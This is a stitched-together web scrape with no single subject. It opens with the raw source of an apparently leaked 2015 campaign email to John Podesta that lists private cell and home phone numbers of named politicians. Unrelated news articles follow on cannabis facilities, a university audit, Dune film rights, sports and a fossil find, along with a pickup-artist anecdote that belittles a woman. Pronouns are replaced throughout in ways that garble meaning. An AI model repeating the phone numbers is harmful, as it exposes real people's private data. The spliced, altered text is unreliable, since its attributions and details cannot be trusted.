/jxwxVu3jylAjTF+zQEZ2tyILwfGi5AffiY3NmlxlsQyk209dl2yxrWwzoci/lihTjS6 Nhvg== X-Gm-Message-State: ALoCoQnLNiKEcGmHu0CgOqfUN94W5u+qnJIQRNUQ95u0Spbxw7ug439SRmElC9GkBe4E8oJjMn3b MIME-Version: 1.0 X-Received: by 10.202.65.136 with SMTP id o130mr14586578oia.134.1444166402548; Tue, 06 Oct 2015 14:20:02 -0700 (PDT) Received: by 10.202.183.135 with HTTP; Tue, 6 Oct 2015 14:20:02 -0700 (PDT) Date: Tue, 6 Oct 2015 17:20:02 -0400 Message-ID: <CAEMn5QmYRyT7YqRKqrK-MQ1Myg4097kcQhUF0BL1CdCqfcTEYg@mail.gmail.com> Subject: VMs: 1 New (OBE from Tony) From: Milia Fisher <mfisher@hillaryclinton.com> To: John Podesta <john.podesta@gmail.com> Content-Type: multipart/alternative; boundary=001a113cd6d26bcfb2052176317b --001a113cd6d26bcfb2052176317b Content-Type: text/plain; charset=UTF-8 *Tony Podesta (OBE)* I'm on my way to getting my hair cut and will be at the house by 5:00. Let me know if you need anything. *VMs from earlier:* *Andrew Cuomo* > It's Andrew Cuomo-- c.u.o.m.o.-- hope you remember me. Give me a buzz when > you get a chance. I want to speak to you, Mr. Chairman, because you are a > glutton for punishment, as am I. I have an idea that I want to do here in > NY that I think could work nicely for Hillary. It's time sensitive. Hope > you're doing well. > Today at 9:15 am > *Call back 1:* (917) 453-0501 > *Call back 2:* (518) 474-7516 > *Assit office number (from previous email): *(212) 681-4598 > > *Robby Mook* > Hope you're doing well. Sorry I missed your call. Didn't realize we had a > call at 9:00. Palmieri and I were out with WaPo. Talk to you later, thanks. > Yesterday at 10:53pm > *Cell: (*802) 272-8878 > > *Claire McCaskill* > Give me a call back at your convenient on my cell or at home. Got some > info about the state department IG. You guys should digest and figure out > what if anything we can do. > Yesterday at 8:58 pm > *Cell:* (314) 440-4447 > *Home:* (202) 842-2836 > > *Jennifer Palmieri* > Calling about Biden. Call me. *(FYI I checked with them and they still > needs to talk to you)* > Sunday at 1 pm > *Call back:* (443) 995-9952 > > *John Stocks* > Calling back-- will be around. Give me a call if you get a chance. > Sunday at 9:36am > *Call back:* (202) 297-1287 > > *Tom Nides (2)* > Call me, thanks > *Call back:* (917) 494-4033 > > *WJC (OBE)* > Calling to check in. I think I had a good week for them out there. Kevin > McCarthy had a great week for them too. Great story I want to tell you about. > Saturday at 11 am > > *Tina Flournoy (OBE)* > Calling you back. > Sunday at 2 pm > > -- > Milia Fisher > Special Assistant to the Chair > Hillary for America > mfisher@hillaryclinton.com > c: 858.395.1741 > -- Milia Fisher Special Assistant to the Chair Hillary for America mfisher@hillaryclinton.com c: 858.395.1741 --001a113cd6d26bcfb2052176317b Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable <div dir=3D"ltr"><div><b>Tony Podesta <i>(OBE)</i></b><br></div><div>I'= m on my way to getting my hair cut and will be at the house by 5:00. Let me= know if you need anything.</div><div class=3D"gmail_extra"><br></div><div = class=3D"gmail_extra"><div class=3D"gmail_quote"><b><u>VMs from earlier:</u= ></b></div><div class=3D"gmail_quote"><br><blockquote class=3D"gmail_quote"= style=3D"margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><d= iv dir=3D"ltr"><div><b>Andrew Cuomo</b></div><div>It's Andrew Cuomo-- c= .u.o.m.o.-- hope you remember me. Give me a buzz when you get a chance. I w= ant to speak to you, Mr. Chairman, because you are a glutton for punishment= , as am I. I have an idea that I want to do here in NY that I think could w= ork nicely for Hillary. It's time sensitive. Hope you're doing well= .</div><div>Today at 9:15 am</div><div><b>Call back 1:</b> <a href=3D"tel:%= 28917%29%20453-0501" value=3D"+19174530501" target=3D"_blank">(917) 453-050= 1</a>=C2=A0</div><div><b>Call back 2:</b> <a href=3D"tel:%28518%29%20474-75= 16" value=3D"+15184747516" target=3D"_blank">(518) 474-7516</a></div><div><= b>Assit office number (from previous email):=C2=A0</b><a href=3D"tel:%28212= %29%20681-4598" value=3D"+12126814598" target=3D"_blank">(212) 681-4598</a>= <br></div><div><b><br></b></div><div><b>Robby Mook</b></div><div>Hope you&#= 39;re doing well. Sorry I missed your call. Didn't realize we had a cal= l at 9:00. Palmieri and I were out with WaPo. Talk to you later, thanks.=C2= =A0</div><div>Yesterday at 10:53pm</div><div><b>Cell: (</b><a href=3D"tel:8= 02%29%20272-8878" value=3D"+18022728878" target=3D"_blank">802) 272-8878</a= ></div><div><b><br></b></div><div><b>Claire McCaskill</b></div><div>Give me= a call back at your convenient on my cell or at home. Got some info about = the state department IG. You guys should digest and figure out what if anyt= hing we can do.=C2=A0</div><div>Yesterday at 8:58 pm</div><div><b>Cell:</b>= <a href=3D"tel:%28314%29%20440-4447" value=3D"+13144404447" target=3D"_bla= nk">(314) 440-4447</a></div><div><b>Home:</b> <a href=3D"tel:%28202%29%2084= 2-2836" value=3D"+12028422836" target=3D"_blank">(202) 842-2836</a></div><d= iv><b><br></b></div><div><b>Jennifer Palmieri</b></div><div>Calling about B= iden. Call me. <i>(FYI I checked with them and they still need to talk to yo= u)</i></div><div>Sunday at 1 pm</div><div><b>Call back:</b> <a href=3D"tel:= %28443%29%20995-9952" value=3D"+14439959952" target=3D"_blank">(443) 995-99= 52</a></div><div><b><br></b></div><div><b>John Stocks</b></div><div>Calling= back-- will be around. Give me a call if you get a chance.</div><div>Sunda= y at 9:36am</div><div><b>Call back:</b> <a href=3D"tel:%28202%29%20297-1287= " value=3D"+12022971287" target=3D"_blank">(202) 297-1287</a></div><div><br= ></div><b>Tom Nides (2)</b><div>Call me, thanks</div><div><b>Call back:</b>= <a href=3D"tel:%28917%29%20494-4033" value=3D"+19174944033" target=3D"_bla= nk">(917) 494-4033</a><br></div><div><br></div><div><div><b>WJC (OBE)</b></= div><div>Calling to check in. I think I had a good week for them out there. = Kevin McCarthy had a great week for them too. Great story I want to tell you= about.</div><div>Saturday at 11 am</div></div><div><br></div><div><div><b>= Tina Flournoy (OBE)</b></div><div>Calling you back.=C2=A0</div><div>Sunday = at 2 pm</div></div><span class=3D"HOEnZb"><font color=3D"#888888"><div><div= ><br></div>-- <br><div><div dir=3D"ltr"><div><div dir=3D"ltr"><div><div dir= =3D"ltr"><div><div dir=3D"ltr">Milia Fisher<div>Special Assistant to the Ch= air</div><div>Hillary for America</div><div><a href=3D"mailto:mfisher@hilla= ryclinton.com" target=3D"_blank">mfisher@hillaryclinton.com</a>=C2=A0</div>= <div>c: <a href=3D"tel:858.395.1741" value=3D"+18583951741" target=3D"_blan= k">858.395.1741</a></div></div></div></div></div></div></div></div></div> </div></font></span></div> </blockquote></div><br><br clear=3D"all"><div><br></div>-- <br><div class= =3D"gmail_signature"><div dir=3D"ltr"><div><div dir=3D"ltr"><div><div dir= =3D"ltr"><div><div dir=3D"ltr">Milia Fisher<div>Special Assistant to the Ch= air</div><div>Hillary for America</div><div><a href=3D"mailto:mfisher@hilla= ryclinton.com" target=3D"_blank">mfisher@hillaryclinton.com</a>=C2=A0</div>= <div>c: 858.395.1741</div></div></div></div></div></div></div></div></div> </div></div> --001a113cd6d26bcfb2052176317b--
Medical marijuana's first product, jobs Construction industry benefitting with need for secure dispensary facilities
David Lipton, managing partner of Advanced Grow Labs, gives a tour of the facility being constructed at 400 Frontage Road in West Haven, Conn. on Tuesday, May 27, 2014. David Lipton, managing partner of Advanced Grow Labs, gives a tour of the facility being constructed at 400 Frontage Road in West Haven, Conn. on Tuesday, May 27, 2014. Photo: Brian A. Pounds Buy photo Photo: Brian A. Pounds Image 1 of / 12 Caption Close Medical marijuana's first product, jobs 1 / 12 Back to Gallery
Months before any cannabis-based products will reach patients, Connecticut's new medical-marijuana industry has already created hundreds of jobs -- in construction.
Former factories are being reconfigured into secure pharmaceutical facilities for the growing, harvesting, curing and preparation of various strains of marijuana that should be delivered to the state's dispensaries by early fall.
Since the state awarded four marijuana producer licenses in January, an estimated $20 million has been committed to the West Haven, Watertown, Portland and Simsbury buildings that in a few weeks will begin growing thousands of pounds of pot.
"As far as we know, folks are busy building out facilities, getting ready to produce product," Department of Consumer Protection Commissioner William M. Rubenstein said in a recent interview. "They have six months to become operational."
In a West Haven industrial zone parallel to Interstate 95, David Lipton, managing partner of the Fairfield-based Advanced Grow Labs, is supervising the conversion of 26,000 square feet of space that will house sterile laboratories, heavily lighted grow areas and budding rooms that will promote marijuana flowers, the part of the plant with the highest concentration of active ingredients.
During a tour of the sprawling, noisy one-story building last week, more than a dozen electricians, sheet-rock experts and other subcontractors worked to transform the space. The biggest construction surprise came, Lipton said, when their structural engineer announced the roof wasn't strong enough to support the heavy-duty HVAC equipment needed to create an optimal growing climate, as well as the planned ceilings and rows of grow lights.
Steel roof beams have since been reinforced to handle the anticipated load and special, moisture-resistant sheetrock will line the walls.
Advanced Grow Labs is one of a series of new projects that are bringing economic growth, said Joseph A. Riccio Jr., commissioner of development for West Haven.
Last year, city building permits brought in $800,000 to the city, but in the first five months of this year, the total has already topped $1 million.
They said the medical marijuana industry is obviously fostering jobs while the region still recovers from the recession.
"This is a good boost for tradesmen," they said during a phone interview last week. "Every job is a good job."
Growing taxes
Lipton estimates their company has invested about $2.5 million in construction and equipment, employing dozens of workers at a time, from structural and mechanical engineers, to steel fabricators to sheetrock installers, tapers, masons, electricians and plumbers. Those workers are generating Worker's Compensation and payroll taxes for the state.
"There's definitely a positive effect on the economy," they said, adding various building and work permits from West Haven generated revenue for the city and that once up and running, the company will also pay personal property taxes.
It was on Advanced Grow Labs' cold, then-empty manufacturing floor, that Rubenstein and Gov. Dannel P. Malloy introduced the four producers who had been selected from 16 applicants.
"In early April we got our full building permit and then the construction began and in about seven weeks we've completed an incredible amount of work here," Lipton said. "Hopefully, within the next few weeks we will complete some more and by early July, mid-July we will be done with construction."
From there it will be about 90 days to harvest.
"We know we're doing the right thing here," said Lipton, adding that it may be a long time before their multi-million-dollar investment is recouped. "We'll do our best to make the best product. This is a long-term business. I mean, how often do you see a start-up pharmaceutical company threaten Big Pharma?"
High-end kitchen
Lipton's grower, Klaus Polttila, standing near what will be employee locker rooms, looked around at the building renovations and thought of the future.
"Growing is the easy part," Polttila said. "Once the construction is done, we'll ramp up very quickly."
Other rooms will be used for drying and curing marijuana. The front entrance near Frontage Road features bullet-proof glass and a security nerve center. Toward the back of the building, in a room with a large walk-in safe, will be the kitchen, where the medical-grade cannabis will be ground up in a process unique to the nation. An outside laboratory will be contracted to test batches to assure they contain the percentage of active ingredients allowed in state regulations.
The marijuana will be packaged for secure delivery to the six designated dispensaries. While traditional dried marijuana will be ready to be smoked, Lipton is planning a variety of other products. Extracting machines in the kitchen will remove chemically active oils from marijuana for use in smokeless vaporizers, baked goods and topical salves.
Thirty-two miles to the north, in a hilltop Watertown industrial park near Route 8, Ethan Ruby, CEO of Theraplant, is supervising a similar conversion to a 63,000-square-foot building, about half of which will be renovated for initial production. The operation will have a 900-square-foot safe for storing market-ready material.
Ruby, who heads the state growers' association, said their company has invested about $8 million, nearly half of the estimated $20 million the four producers have spent for the initial phases of operations.
On a recent day, Ruby counted 73 workers on-site, including landscapers, sheetrock installers and electricians.
"It's going well," Ruby said in a phone interview. "Our team that we put together has been incredibly diligent. The construction company has been on time and on budget during every single phase. And we couldn't be happier with local building inspectors, fire, police. Couldn't be happier. Patients should have product by the end of the summer."
Laboratory science
Theraplant will not have a kitchen to create baked goods, but does have plans for extracting the THC and other cannabinoids that are the plants' active ingredients. About 2,000 patients have registered so far, with ailments including cancer, Parkinson's disease, multiple sclerosis, HIV/AIDs, Crohn's disease and epilepsy.
Ruby has contacted laboratories that will be required to test batches of harvested plant material, but it's too soon to sign agreements, they said.
It's too soon to determine what marijuana will cost patients, but Lipton and Ruby both said they will seek to make it competitive, or cheaper than the underground market. The website priceofweed.com rates Connecticut's market at $300 to $400 per ounce. Participants in the medical marijuana program will be able to purchase up to two-and-a-half ounces per month.
Vaporization of the drug will likely become the preferred delivery method, Ruby said, allowing patients to inhale the chemical compounds without actually smoking the material.
"The more health-conscious will be gravitating toward this," Ruby said. "And doctors and pharmacists will be better able to control prescribed amounts."
They feel good about the producers, including CT Pharmaceutical Solutions in Portland and Curaleaf in Simsbury, and their ability to meet market demands.
"Each cares about getting medicine to the patients in a controlled way," they said. "As a producer, I'm not trying to grow a better strain than David Lipton. We're in competition with people who don't believe this is going to work."
kdixon@ctpost.com; 860-549-4670; twitter.com/KenDixonCT; facebook.com/kendixonct.hearst; blog.ct news.com/dixon
.......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... .......... ..........
Copyright © 2013 Albuquerque Journal
The Student Bar Association at the University of New Mexico is under investigation for an unauthorized, off-campus bank account used to cover the tab at wine bars, liquor stores, nail salons and restaurants, according to Law School officials.
Records also show a number of cash withdrawals from the account, which contains money from the university and fees paid by Law School students. The withdrawals being investigated occurred from April 2012 through April 2013, according to the records.
ADVERTISEMENTSkip
UNM's Internal Audit Department is investigating to determine whether laws were violated, according to a statement released Monday by the university. The questionable spending involves thousands of dollars during the 2012-13 budget year, and some of the costs were incurred in San Francisco and Los Angeles, according to Law School officials and documents released Monday. However, the total amount under investigation is unclear.
The account has since been closed.
UNM's Police Department is aware of the ongoing audit “and will review the findings to determine if further action should be taken,” according to the statement. Also, as required by law and university policy, UNM has notified State Auditor Hector Balderas of a possible misuse of funds and will send the results of its investigation to their office when it is completed.
The UNM statement said the account is contrary to a university policy that pertains to “Faculty, staff, students, and volunteers who receive University monies (and who) are responsible for the collection, safekeeping, and deposit of all monies entrusted to them and for the safety of employees who handle the monies.”
Campus groups that collect student money must deposit it into an account established by the university controller, according to a Sept. 3 memo from Bonnie Stepleton, assistant dean for student services, and Carol Parker, associate dean for finance and administration, that was sent to last year's Student Bar Association officers. It does not name them.
The memo, and an earlier one in August, demanded from the officers:
ADVERTISEMENTSkip
⋄ All bank account statements since the account was opened;
⋄ A written statement of the business purpose of each transaction made during your term as SBA officers; and
⋄ A copy of all expenditure receipts available.
UNM on Monday released to the Journal numerous pages of bank statements for the account at the New Mexico Educators Federal Credit Union.
It was unclear how many students had access to and used the off-campus account, but it may have been just one person who was not identified.
The bank statements show a number of cash withdrawals within a two-week period in April 2012. For example, a withdrawal of $303 was made on April 15 from a Central Avenue location. Another withdrawal of $300 was made at a Lomas Avenue facility three days later; another for $143 on April 24 from a Menaul address; and yet another on April 26 for $300, also from the Lomas address.
ADVERTISEMENTSkip
The records list withdrawals made through April of this year.
Several expenditures were made from establishments that sell alcohol: the Zinc Wine Bar and Bistro, the Ferrari Carano Winery, Jubilation Wine and Spirits, Kelly's Brewery and O'Niell's Pub – two of which were made on the same day. One was for $254, the other for $331.
Other expenditures were made at hotels and restaurants, including a Hyatt Hotels Resort and Spa, Starbucks and Korean BBQ House. Most were made in Albuquerque, but some were in Los Angeles and San Francisco.
Other expenditures were for utilities, including the Albuquerque Bernalillo County Water Utility Authority and New Mexico Gas Co., and retail stores, such as a Target and Tiffany's in San Francisco.
There also was an $80 payment to Betty's Bath and Day Spa.
Two $70 payments went toward registration fees for the Multistate Professional Responsibility Exam, an ethics test that aspiring lawyers must pass before they take the state bar exam.
ADVERTISEMENTSkip
The documents were released to the Journal under the Inspection of Public Records Act. A law student, Christopher Dodd, initiated the request. On Monday, they told the Journal they had hoped to remain anonymous, but later in the day they sent out an email to the UNM Law School community outlining their request and attaching all of the documents.
They said in the email that they submitted the IPRA request to the university custodian of records, seeking documents indicating amounts believed to have disappeared from the UNM School of Law Student Bar Association's bank accounts in the past three years.
“I felt that as the issue concerns our money, every student is entitled to see the records,” they said in their email.
The university, in its statement, said, “While the investigation is moving forward, UNM is complying with public requests for information by the media and other parties under the Inspection of Public Records Act (IPRA), balanced with the legal restrictions required under Family Education Rights and Privacy Act (FERPA), which protects the privacy of students. Any information that identifies students related to this investigation is a violation of FERPA. …
“University Counsel and UNM Communications staff will continue to work to comply with requests for information as efficiently and transparently as possible without jeopardizing the integrity of the ongoing investigation.”
EXCLUSIVE: Paramount has turned loose the giant worm, and everything else that was part of the seminal Frank Herbert science fiction novel series Dune. The studio's four-year attempt to make a movie out of the franchise has fallen by the wayside. Paramount and the rights holders came to a parting of the ways as the rights lapsed. “Paramount's option has expired and we couldn't reach an agreement,” said Richard P. Rubinstein, who controls the rights to what is considered the biggest-selling science fiction book ever. “I'm going to look at my options, and whether I wind up taking the script we developed in turnaround, or start over, I'm not sure yet.”
Dune tells the story of an interplanetary battle for control of the desert planet Arrakis and its supply of Melange, a spice that can be ingested. Those who take it live longer and have a prescient sense of awareness. The substance is necessary for space travel. The book was turned into a 1984 flop by David Lynch, but a miniseries that came later fared better.
Rubinstein said that Paramount's exit came down to dollars, but the producer said they and the rights holders were OK with it. “Sure, it's frustrating, how long this has taken, but most of what I've done that worked out well over the years, like the miniseries The Stand, took a long time,” Rubinstein said. “Since I know what I want, eventually, I'll find someone who'll agree with me. What I like is that talent has interesting things to say on how they would approach it.” Rubinstein had been producing with Kevin Misher, but everything's up in the air at the moment. “Right now, Dune has no commitments or attachments,” they said. Rubinstein and their company New Amsterdam made the Dune miniseries, and they are the gatekeeper for the rights on behalf of the author's estate and ABC. Even though Pete Berg dropped out to do Battleship, Dune for a time looked like it had a fighting chance. Rubinstein and Misher quite liked the job that Taken helmer Pierre Morel did in collaborating with Chase Palmer. They managed to get a script that cut the mammoth subject matter down to a compelling story that could be told at feature length. Rubinstein said that they would probably re-approach Morel and Palmer, but those conversations haven't yet happened. All they now need is a financier ready to put up the $100 million or so in production budget needed to get the film under way. If they do use the Palmer script, Paramount stands to recoup some of its development costs.
Manchester United defender Guillermo Varela has criticised Eintracht Frankfurt after being suspended for going against club orders by getting a tattoo before the German Cup final.
Varela is frustrated at not being able to join their team-mates for Saturday's showpiece against Borussia Dortmund having been banned by the club over their new artwork.
The Uruguayan right-back has described their new tattoo as 'not very big', but it was sufficient enough to anger Frankfurt officials who had warned them specifically against having it done.
Guillermo Varela has been banned by Eintracht Frankfurt after their tattoo got infected
The controversial tattoo of La Catrina led to Varela's suspension from the Bundesliga club
Varela has been suspended and told to return to Manchester after their arm suffered an inflammation, ruling them out of the season finale at the Olympiastadion in Berlin.
But it would appear that the 24-year-old is not going quietly, after they accepted an interview with Munich-based paper Suddeutsche Zeitung.
Varela said: 'My name is polluted. I wonder what Real Madrid should do with Sergio Ramos, who is tattooing every week.
'I cannot explain why I'm being so severely punished, and I'm not the only Eintracht professional to get a tattoo before the final, but only I was nailed to the cross for going against the manager.
The defender, who is on loan from Manchester United, is unfit for the German Cup final
The Uruguayan has previously posted snaps of their tattoos on Instagram for their followers
Varela has played four times in the Premier League for United since joining in 2013
'Before the 2016 FA Cup final [against Crystal Palace], we went out with several players and got a tattoo, and then we won. Now I wanted to repeat that because it brought us so much luck with Manchester.'
Varela, who joined United in 2013, had an angel inked onto them last year prior to the Wembley showdown, and this year they opted for an image of La Catrina, a painted woman's face and motif from Mexico's 'Day of the Dead' tradition.
The Uruguayan has only made 10 appearances in all competitions for the Bundesliga side since joining them on a year-long loan last summer.
They had featured in the past five league and cup games, meaning a start against Dortmund would have been likely.
The 24-year-old was the first signing of ex-manager David Moyes and has had two loan spells
Varela has been on loan at the German side all season, but injuries have hampered their year
Varela's quotes come after Frankfurt's sporting director Fredi Bobic had explained the reasons for their ban earlier this week.
'The club cannot tolerate that a player would defy instructions. They hurt the team,' said Bobic.
'There was redness around where they had the tattoo, and blisters formed meaning they were unable to train. We'd been thinking about a loan extension. But that won't happen. He'll be suspended with immediate effect.'
Former Eintracht Frankfurt player and manager Rudi Bommer told BBC World Service that Varela's actions were 'unprofessional and embarrassing'.
Bommer added: 'I am struggling to make any sense of it, I am struggling to believe it. You're a professional and you know the cup final is happening.
'I cannot understand their decision-making at all but I can understand [manager] Niko Kovac's decision to suspend him.'
Frankfurt have suspended the player, and are now unlikely to extend their loan spell
SCOTTSDALE, Ariz. — Michael Morse provided the highlight of the first day of BP when they skied a homer off the upper portion of the light tower in left field. There aren't many players in Giants camp who can hit a ball that high, and one of them wasn't on the main field Friday.
The Giants held Hunter Pence back from batting practice because of soreness in their right intercostal area. Pence had to pull back late in their offseason program after feeling something during a workout.
“He did all baseball activities except hitting (on the field),” manager Bruce Bochy said. “We're controlling their workload right now, is the best way to put it. He's real close. They just didn't hit today.”
Bochy said there's not much concern about the ailment, and Pence has said — both at FanFest and this week — that he's fine. The Giants are being rightfully cautious with a player who has played just 158 games the past two seasons.
Pence did take part in the fielding portion of the day, and their group might have given an early clue as far as left field goes. The outfielders were split into groups of three, and Pence shagged fly balls with Denard Span and Jarrett Parker. As of today, that's probably your opening day outfield. But Mac Williamson has six weeks to change it up.
“It's time for them to get that opportunity,” Bochy said of Parker and Williamson. “We'll throw them out there as much as we can this spring.”
DID THAT MEAN SOMETHING? This is a new portion of the daily recap, and you could have thrown the Parker thing in here. Clearly it's no accident that he's the first one up with Pence and Span. By the same token, I'll note that Morse spent their day at first base, not with the outfielders. Reporters talk to Bochy and Bobby Evans multiple times a day during spring training, but often times the action on the field tells the whole story. Morse will need to show he's viable in left field to make the team, but the Giants haven't said exactly how much they plan to play them out there.
PROSPECT WATCH: There was a lot of talk about third base today after the Giants signed Aaron Hill to a minor league deal. Look, the reality here is that Conor Gillaspie is a clear frontrunner for that spot behind Eduardo Nuñez, as they should be, but Hill, Jimmy Rollins, Jae-gyun Hwang and others are going to get quite a bit of time this spring and one of them might make the team.
So … where does that leave Christian Arroyo? The organization's top hitting prospect wasn't on the main field when a big group took grounders and the logjam will likely cost them at-bats this spring. To me, that's the biggest problem with carrying so many 30-somethings, and Evans acknowledged that Arroyo will lose spring playing time. But, they said, the Giants don't necessarily need to see their at-bats.
“We know they can hit at this level,” Evans said.
Arroyo was 10-for-18 last spring and he's 14-for-26 in two big league camps. He'll be in camp for most of spring training if not all of it, but if you're coming down to Scottsdale next month, you might not see a whole lot them during games.
ICYMI: Will link to this one more time … here's my podcast with Tyler Beede, and here's the iTunes page for the Giants Insider Podcast. Taped with two more players today, so be on the lookout for the next one.
FAMILIAR FACE: Vince Coleman is now with the Giants as a roving baserunning instructor. You literally couldn't come up with a better option. Coleman, a two-time All-Stars in the late 80s, stole more than 100 bases in three consecutive seasons.
QUOTABLE: “It's a power right-handed bat. He's a solid second baseman. When they moved them to third base I didn't know how good they would be, but against us they played great defense,” Bochy on Hill, who passed their physical late Thursday and joined camp Friday morning.
Meet Damon, our latest Patron Cameo, and the “My Work, My Way” camera. I somehow get the impression that this setting, encapsulating the giant Molly Mural and this live streaming camera may be a recurring one. Who knows, I only work here.
Speaking of recurring, it seems that there's a running theme around a certain webcomic called Don't Hit Save, in which they have this unfortunate frequent tendency to go viral. This time, the mainstream media took notice (oh, clicks the “Fury and Fear” link if you don't see what i'm talking about).
Anyway, I think Molly spends a lot of time getting zapped and shocked what with all of their hardware disasters and dares, so a little shot like this would probably end up tickling more than anything else. Chuck seems to be aware of this.
I myself am aware that I am needed elsewhere, so I'll leave it at this for now. Back next week.
:Dan
TNT and TBS have handed out three series renewals, it was announced Wednesday.
TNT's first-year student drama “Animal Kingdom,” TBS' new comedy “Wrecked” and sophomore laffer “Angie Tribeca” have all been renewed for new seasons of 10 episodes each.
Since rebranding in January, TBS has premiered and renewed four new comedies: “Angie Tribeca,” “Full Frontal with Samantha Bee,” “The Detour” and “Wrecked.” All four rank among the year's Top 10 new cable comedies among adults 18-49, with “Wrecked” and “The Detour” topping the chart.
“A year ago we began reinventing TBS, and thanks to the incredible talent behind these shows, we've come a long way in a very short amount of time,” Brett Weitz, head of original programming for TBS, says in a statement. “Pulling the trigger on renewals early allows us to build on our success by giving fans new seasons more quickly.”
TNT's original programming head Sarah Aubrey says, “‘Animal Kingdom' has signaled the new tone for TNT dramas and is moving the network in the direction we hoped it would. I'm confident that our strategy of working with high-caliber talent and then getting out of their way will continue to pay off.”
“Wrecked” is averaging a 0.5 same-day rating in adults 18-49 and 1.36 million viewers through four episodes; TBS says delayed and multiplatform viewing pushes it to 5.2 million. “Angie Tribeca” draws a 0.3 and 605,000 viewers same-day (2.6 million multiplatform viewers).
On TNT, “Animal Kingdom's” first four episodes have averaged a 0.4 and 1.19 million viewers; TNT says the multiplatform number is 6.7 million.
In this illustration by Marianne Collins/Royal Ontario Museum shows a Capinatator praetermissus. Long before dinosaurs roamed the Earth, a bizarre creature swam the seas, a miniaturized prequel of “Jaws.” The Capinatator didn't even have a face. Instead 50 curved rigid spines jutted out of its head. And when some unsuspecting critter came too close, those jaw-like spines snapped together and dinner was served. (Marianne Collins/Royal Ontario Museum via AP)
WASHINGTON (AP) — Long before dinosaurs roamed the Earth, a bizarre creature with a Venus flytrap-like head swam the seas.
Scientists have uncovered fossils of a tiny faceless prehistoric sea worm with 50 spines jutting out of its head. When some unsuspecting critter came too close, its jaw-like spines snapped together and dinner was served.
The discovery reported in Thursday's journal Current Biology offers a glimpse into the Cambrian explosion of life on Earth about 541 million years ago.
The new creature dubbed Capinatator praetermissus is so different that scientists said the fossils represent not only a new species, but a new genus — a larger grouping of life — as well.
It was only 4 inches long and its spines were about one-third of an inch long. It feasted on smaller plankton and shrimp-like creatures.
It is an ancestor of a group of marine arrow worms called chaetognatha that are abundant in the world's oceans. The prehistoric version was larger and with far more spines in its facial armory but without the specialized teeth of its descendants, said Derek Briggs of Yale University who led a team that discovered the trove of fossils in two national parks in British Columbia, Canada.
“The spines are like miniature hooks, although more gently curved. They were stiff rather than flexible,” Briggs said in an email. “It's hard to say why there are so many spines in the fossil example — but presumably thus armed it was a successful predator.”
Capinatator — whose name translates to grasping swimmer — lived 500 million years ago at a time when creatures started getting bigger and more diverse. It's difficult to find complete fossils belonging to the chaetognatha family because they decayed easily, said Briggs. This latest find, however, was so good that even soft tissue was saved, giving scientists a good idea about what Capinatator looked like.
The discovery expands scientists' knowledge of a “pretty enigmatic” group of animals from the Cambrian era, said Smithsonian paleobiologist Doug Erwin, who had no role in the research.
___
Follow Seth Borenstein on Twitter at @borenbears . Their work can be found here .
Next season, Russian hockey fans will have options.
The nation's greatest athletic exports will be carried live for the first time, as it has been announced that the NHL reached a multi-platform partnership with Eurosport to broadcast games for the next three seasons.
"This agreement with Eurosport will come as great news to NHL fans in Russia," the NHL's Executive Vice President of Media Distribution and Strategy said in a statement.
"Our global strategy and commitment is to bring the biggest stars in the NHL into homes around the world and to inspire the future generation of NHL players."
Eurosport is the leader in winter sports coverage in Europe. It broadcasts major international tournaments and competitions for a variety of popular winter sports, and also provides coverage for Russia's Kontinental Hockey League.
Not long ago, I was at a “networking event” with some people I know in various professional capacities. The post-business-drinks-and-music part was held at a fancy bar-lounge. There, I spotted a married guy I know talking to a hot Mediterranean-looking girl. Naturally, it wasn't long before they gathered their things and left the bar. I didn't hesitate for one-crumb-of-a-second, and subtly swooped in to take their place. I wasn't overtly hitting on the girl, but their attractiveness was the only reason I was talking to them
Early in the conversation, the dialog took a weird turn:
Tuthmosis: So, how do you know them [my married friend] anyway? Girl: My boyfriend is Canadian. Tuthmosis: OK, it was good knowing you. [smiling politely, waving, and starting to walk away] Girl: What? What do you mean? Tuthmosis: You used the magic word. You were giving me a cue. Girl: Yeah, but… [stammering]. Well, you didn't have to make things awkward. Tuthmosis: I could tell you the same thing. Loading...
I said all of this with a smile on my face, but they knew I was being more serious than joking. The conversation pretty much ended there, but I quickly learned that this girl was going around the room and complaining to anyone who would listen about what I'd “done to [her].” Several people asked me about it throughout the night, much to my own mirth.
I explained.
This girl made things awkward first, for me, by forcefully and transparently inserting their boyfriend into the conversation. It was obvious that that they were trying to prevent me from hitting on her, even though I'd made no obvious overtures. I merely bounced their awkwardness back at her—apparently to their great discomfort. So, let's see if I have this straight: a man is somehow supposed to ‘play it cool' when a girl eliminates the possibility of a romantic connection? Look around. There are at least a dozen cute, stylish, single chicks here. Yet, I'm supposed to continue to regale this girl with my stories, make them laugh with my jokes, and lavish them with validation, despite the confirmed fact that I have zero chance of getting with her? They can use the social weapon of selectively withdrawing from part of the conversation, but I can't?
I was surrounded by girls the rest of the night. I became famous in that room.
On Saturday, I was on hand for the Miami Hurricanes 2016 spring game. In the end, the Green team (1st team offense/2nd team defense) beat the Orange team (2nd team offense/1st team defense) 24-7. You can read the post-game quotes here.
Outside of those quotes, these are my thoughts on the game, and where the team stands as we head into the summer.
Brad Kaaya is the f*cking truth
I know that you know this, but it's worth repeating: Brad Kaaya is an elite QB. He's so good. And, I think it's worth saying because he's been the Canes' starter for years so we may take them for granted. That would be a mistake.
Kaaya ended the spring game with a stat line of 29-45 passing, 345 yards, 3 TD and 1 INT (his first of the spring, btw). That stat line included no less than 5 drops by their receivers. Kaaya was equally effective under center and in shotgun. We knew this already, but they proved once again that he's the real deal.
HOWARD SCHNELLENBERGER!!!!!
What's that? Oh, nothing. Just the architect of Miami Hurricanes Football posing with some cheerleaders. Ho hum.
Running Back Depth is a plus
Miami has 3 RBs who could conceivably start, and 4 who should be able to see time in the rotation. Mark Richt and RB coach/OC Thomas Brown are both proponents of using multiple RBs in their offense. So, I fully expect to see 50+ carries this year from the top 3 guys.
Which leads me to my next point: this is how I see the RB depth chart heading into summer.
